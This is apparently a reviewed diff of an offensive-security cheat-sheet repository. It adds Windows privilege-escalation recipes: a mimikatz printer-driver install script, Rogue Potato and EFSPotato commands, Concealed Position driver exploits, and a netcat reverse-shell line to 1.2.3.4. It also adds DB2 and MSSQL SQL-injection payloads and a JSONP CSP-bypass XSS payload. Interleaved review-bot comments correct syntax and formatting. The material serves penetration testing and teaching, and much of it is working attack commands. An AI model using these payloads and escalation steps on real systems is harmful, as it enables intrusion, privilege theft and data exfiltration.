* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
|
||||
* [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
|
||||
* [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012)
|
||||
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
|
||||
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
|
||||
* [CVE-2019-1388](#cve-2019-1388)
|
||||
* [MS08-067 (NetAPI)](#ms08-067-netapi)
|
||||
* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
|
||||
* [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
|
||||
* [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012)
|
||||
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
|
||||
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
|
||||
* [CVE-2019-1388](#cve-2019-1388)
|
||||
* [EoP - $PATH Interception](#eop---path-interception)
|
||||
* [References](#references)
|
||||
|
||||
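Review bot: three TOC anchors in this hunk are broken. `[Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))` and `[EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))` each end in a doubled `)`, which renders a stray parenthesis after the link, and `[EoP - Printers](#eop-printers)` uses a single dash where the file's convention for ` - ` in a heading is `---` (compare `#eop---runas` directly below), so it should be `#eop---printers`.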
@ -950,6 +955,67 @@ Citrix USB Filter Driver
|
||||
<SNIP>
|
||||
```
|
||||
|
||||
## EoP - Printers
|
||||
|
||||
### Universal Printer
|
||||
|
||||
Create a Printer
|
||||
|
||||
```ps1
|
||||
$printerName = 'Universal Priv Printer'
|
||||
$system32 = $env:systemroot + '\system32'
|
||||
$drivers = $system32 + '\spool\drivers'
|
||||
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
|
||||
|
||||
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
|
||||
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
|
||||
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
|
||||
|
||||
Add-PrinterDriver -Name 'Generic / Text Only'
|
||||
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
|
||||
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
|
||||
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
|
||||
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
|
||||
```
|
||||
|
||||
Execute the driver
|
||||
|
||||
```ps1
|
||||
$serverName = 'dc.purple.lab'
|
||||
$printerName = 'Universal Priv Printer'
|
||||
$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
|
||||
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
|
||||
Add-Printer -ConnectionName $fullprinterName
|
||||
```
|
||||
|
||||
### Bring Your Own Vulnerability
|
||||
|
||||
Concealed Position : https://github.com/jacob-baines/concealed_position
|
||||
|
||||
* ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE
|
||||
* RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE
|
||||
* POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE
|
||||
* SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detail/CVE-2020-1300) - Windows Print Spooler LPE
|
||||
|
||||
```powershell
|
||||
cp_server.exe -e ACIDDAMAGE
|
||||
# Get-Printer
|
||||
# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing"
|
||||
cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
|
||||
cp_client.exe -l -e ACIDDAMAGE
|
||||
```
|
||||
|
||||
## EoP - Runas
|
||||
|
||||
Use the `cmdkey` to list the stored credentials on the machine.
|
||||
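Review bot: the `### Universal Printer` blocks do not say where each runs. The `Create a Printer` script copies `mimispool.dll` into `%systemroot%\system32` and the spooler driver directories and writes under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\`, which needs administrative rights on the print server, whereas `Execute the driver` runs on the client that connects to `\\<server>\<printer>`; label the two hosts and mark `$serverName = 'dc.purple.lab'` as a placeholder. The `Bring Your Own Vulnerability` block likewise runs `cp_server.exe` and `cp_client.exe` on different machines (`-r 10.0.0.9` is the server side) without saying so, and the `# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing"` comment should say on which of them that setting is changed.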
@ -1068,7 +1134,6 @@ SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
|
||||
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
|
||||
```
|
||||
|
||||
|
||||
### Meterpreter getsystem and alternatives
|
||||
|
||||
```powershell
|
||||
@ -1081,8 +1146,8 @@ python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
|
||||
|
||||
### RottenPotato (Token Impersonation)
|
||||
|
||||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||||
* Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
* Binary available at : https://github.com/breenmachine/RottenPotatoNG
|
||||
|
||||
```c
|
||||
getuid
|
||||
@ -1101,10 +1166,12 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
|
||||
```
|
||||
|
||||
|
||||
### Juicy Potato (abusing the golden privileges)
|
||||
### Juicy Potato (Abusing the golden privileges)
|
||||
|
||||
Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||
:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +.
|
||||
> If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato**
|
||||
> If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato**
|
||||
|
||||
* Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||
|
||||
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
|
||||
|
||||
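Review bot: the second condition is malformed: `If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato**` chains two `<` comparisons; write `< Windows 10 1809 or < Windows Server 2019` to mirror the line above it. The same statement now appears twice in a row (`:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +.` and the blockquote); keep one.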
@ -1135,6 +1202,39 @@ Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||
[+] CreateProcessWithTokenW OK
|
||||
```
|
||||
|
||||
### Rogue Potato (Fake OXID Resolver)
|
||||
|
||||
* Binary available at https://github.com/antonioCoco/RoguePotato
|
||||
|
||||
```powershell
|
||||
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
|
||||
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
|
||||
|
||||
# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.
|
||||
# Use this if you have fw restrictions.
|
||||
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
|
||||
|
||||
# RoguePotato all in one with RogueOxidResolver running locally on port 9999
|
||||
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
|
||||
|
||||
#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
|
||||
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
|
||||
```
|
||||
|
||||
### EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
|
||||
|
||||
* Binary available at https://github.com/zcgonvh/EfsPotato
|
||||
|
||||
```powershell
|
||||
# .NET 4.x
|
||||
csc EfsPotato.cs
|
||||
csc /platform:x86 EfsPotato.cs
|
||||
|
||||
# .NET 2.0/3.5
|
||||
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
|
||||
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
|
||||
```
|
||||
|
||||
|
||||
## EoP - Privileged File Write
|
||||
|
||||
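Review bot: the `.NET 4.x` lines in the `EFSPotato` block call a bare `csc`, which is not on `PATH` on a stock Windows install, while the `.NET 2.0/3.5` lines use the full framework path; for consistency and so the command works as pasted, use `C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe EfsPotato.cs` (and the `Framework64` directory for a 64-bit build). In the `Rogue Potato` block the socat comment says `must use port 135 as src port`; it is the listening port on the redirector (`tcp-listen:135`), not a source port, so reword it to avoid confusion.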
@ -1349,3 +1449,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
||||
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)
|
||||
* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1)
|
||||
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
||||
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
|
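Review bot: the added reference has a stray parenthesis in its title: `[Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](...)`; drop the `)` before `]`. Its date form (`AUGUST 2, 2021`) also differs from the neighbouring entries (`August 19, 2019`, `14 - JUN - 2018`); the list is already inconsistent, but new entries could at least follow the `Month D, YYYY` form.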
208
SQL Injection/DB2 Injection.md
Normal file
@ -0,0 +1,208 @@
|
||||
# DB2 Injection
|
||||
|
||||
>
|
||||
|
||||
## Summary
|
||||
|
||||
* [DB2 Cheatsheet](#db2-cheatsheet)
|
||||
* [References](#references)
|
||||
|
||||
## DB2 Cheatsheet
|
||||
|
||||
### Version
|
||||
|
||||
```sql
|
||||
select versionnumber, version_timestamp from sysibm.sysversions;
|
||||
select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
|
||||
select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
select service_level,bld_level from sysibmadm.env_inst_info
```
### Comments
```sql
select blah from foo -- comment like this (double dash)
```
### Current User
```sql
select user from sysibm.sysdummy1
select session_user from sysibm.sysdummy1
select system_user from sysibm.sysdummy1
```
### List Users
DB2 uses OS accounts
```sql
select distinct(authid) from sysibmadm.privileges -- priv required
select grantee from syscat.dbauth -- incomplete results
select distinct(definer) from syscat.schemata -- more accurate
select distinct(grantee) from sysibm.systabauth -- same as previous
```
### List Privileges
```sql
select * from syscat.tabauth -- shows priv on tables
select * from syscat.tabauth where grantee = current user -- shows privs for current user
select * from syscat.dbauth where grantee = current user;;
select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies
```
### List DBA Accounts
```sql
select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’
```
### Current Database
```sql
select current server from sysibm.sysdummy1
```
### List Databases
```sql
select distinct(table_catalog) from sysibm.tables
SELECT schemaname FROM syscat.schemata;
```
### List Columns
```sql
select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat
```
### List Tables
```sql
select table_name from sysibm.tables
select name from sysibm.systables
```
### Find Tables From Column Name
```sql
select tbname from sysibm.syscolumns where name='username'
```
### Select Nth Row
```sql
select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
```
### Select Nth Char
```sql
select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b
```
### Bitwise AND/OR/NOT/XOR
```sql
select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot
```
### ASCII Value
```sql
Char select chr(65) from sysibm.sysdummy1 -- returns 'A'
```
### Char -> ASCII Value
```sql
select ascii('A') from sysibm.sysdummy1 -- returns 65
```
### Casting
```sql
select cast('123' as integer) from sysibm.sysdummy1
select cast(1 as char) from sysibm.sysdummy1
```
### String Concat
```sql
select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
```
### IF Statement
Seems only allowed in stored procedures. Use case logic instead.
### Case Statement
```sql
select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1
```
### Avoiding Quotes
```sql
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too
```
### Time Delay
Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.
```sql
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
```
### Serialize to XML (for error based)
```sql
select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
```
### Command Execution and Local File Access
Seems it's only allowed from procedures or UDFs.
### Hostname/IP and OS INFO
```sql
select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv
```
### Location of DB Files
```sql
select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv
```
### System Config
```sql
select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
```
### Default System Database
* SYSIBM
* SYSCAT
* SYSSTAT
* SYSPUBLIC
* SYSIBMADM
* SYSTOOLs
## References
* [DB2 SQL injection cheat sheet - Adrián - 20/05/2012](https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
* [DB2 SQL Injection Cheat Sheet - pentestmonkey](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
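Review bot: several queries in the new DB2 file will not parse as written because typographic characters have replaced SQL punctuation. `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` uses an em-dash instead of `--`, so the trailing text is not a comment (and "privilegies" should be "privileges"); `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’` uses curly quotes where DB2 needs straight `'Y'` and `'G'`; and `Char select chr(65) from sysibm.sysdummy1 -- returns 'A'` has a stray `Char` before `select`. Also fix the `;;` on the `syscat.dbauth` line, `xmelement` should be `xmlelement` on the `xml2clob` line, the empty `>` blockquote under the title needs a one-line description or should go, and the "Default System Database" list actually names schemas (`SYSIBM`, `SYSCAT`, `SYSIBMADM`), so retitle it and write `SYSTOOLS` in full caps like the others.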
@ -2,9 +2,11 @@
## Summary
* [MSSQL comments](#mssql-comments)
* [MSSQL version](#mssql-version)
* [MSSQL database name](#mssql-database-name)
* [MSSQL Comments](#mssql-comments)
* [MSSQL User](#mssql-user)
* [MSSQL Version](#mssql-version)
* [MSSQL Hostname](#mssql-hostname)
* [MSSQL Database name](#mssql-database-name)
* [MSSQL List databases](#mssql-list-databases)
* [MSSQL List columns](#mssql-list-columns)
* [MSSQL List tables](#mssql-list-tables)
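Review bot: the switch to Title Case is applied only to the Summary entries this hunk touches (`MSSQL Comments`, `MSSQL Version`, `MSSQL Database name`) while the neighbouring unchanged entries stay lowercase (`MSSQL List databases`, `MSSQL List columns`, `MSSQL List tables`), and `Database name` is itself only half capitalised; pick one convention and apply it to the whole list. The `#mssql-...` anchors are unaffected because GitHub lowercases heading ids, so the links keep resolving either way.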
@ -22,7 +24,7 @@
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
* [MSSQL Trusted Links](#mssql-trusted-links)
## MSSQL comments
## MSSQL Comments
```sql
-- comment goes here
@ -33,6 +35,9 @@
```sql
SELECT CURRENT_USER
SELECT user_name();
SELECT system_user;
SELECT user;
```
## MSSQL version
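Review bot: the three added lines `SELECT user_name();`, `SELECT system_user;` and `SELECT user;` end with semicolons while the existing `SELECT CURRENT_USER` does not; keep one style within the block. A short comment would also help readers, because these do not all return the same thing: in T-SQL `SYSTEM_USER` returns the login name, while `CURRENT_USER`, `USER` and `USER_NAME()` return the database user name the login is mapped to.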
@ -41,7 +46,14 @@ SELECT CURRENT_USER
SELECT @@version
```
## MSSQL database name
## MSSQL Hostname
```sql
SELECT HOST_NAME()
SELECT @@hostname;
```
## MSSQL Database name
```sql
SELECT DB_NAME()
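Review bot: `SELECT @@hostname;` in the new `## MSSQL Hostname` block is MySQL syntax; SQL Server has no `@@hostname` variable and the statement errors out. The server's own name comes from `@@SERVERNAME` (or `SERVERPROPERTY('MachineName')`), so replace the line. `SELECT HOST_NAME()` does run, but it returns the name of the client workstation that opened the connection, not the database server, so the heading or a comment should say which name each line yields. The semicolon use is also inconsistent between the two lines.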
@ -122,6 +134,13 @@ For string inputs : ' + cast((SELECT @@version) as int) + '
## MSSQL Blind based
```sql
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
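Review bot: the first two lines of the new `## MSSQL Blind based` block are syntactically wrong in T-SQL. In `AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -` a scalar subquery used as a function argument needs its own pair of parentheses, and in `AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97` the parentheses are misplaced so `,1,1` ends up as extra arguments to `ASCII`; mirror the bracketing already used two lines further down in `AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--`, which is correct. `TOP 1` without `ORDER BY` is also nondeterministic, worth a comment since the following lines depend on reading the same row each time.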
@ -283,4 +302,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975)
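Review bot: the reference `* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)` appears twice in this hunk with identical text and URL; unless the first copy is the removed side of a whitespace-only change, the hunk leaves a duplicate entry in the reference list and the second copy should be dropped.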
@ -1004,7 +1004,9 @@ Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.wi
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
```
More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
More JSONP endpoints:
* [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
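Review bot: in the new list item `* [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)` the link text keeps a leading slash that the relative target lacks; make the two agree (the relative path without the slash is the one that resolves from inside the repository), and keep the one-line sentence replaced here (`More JSONP endpoints:`) ending in a colon only if the list directly follows it, which it does.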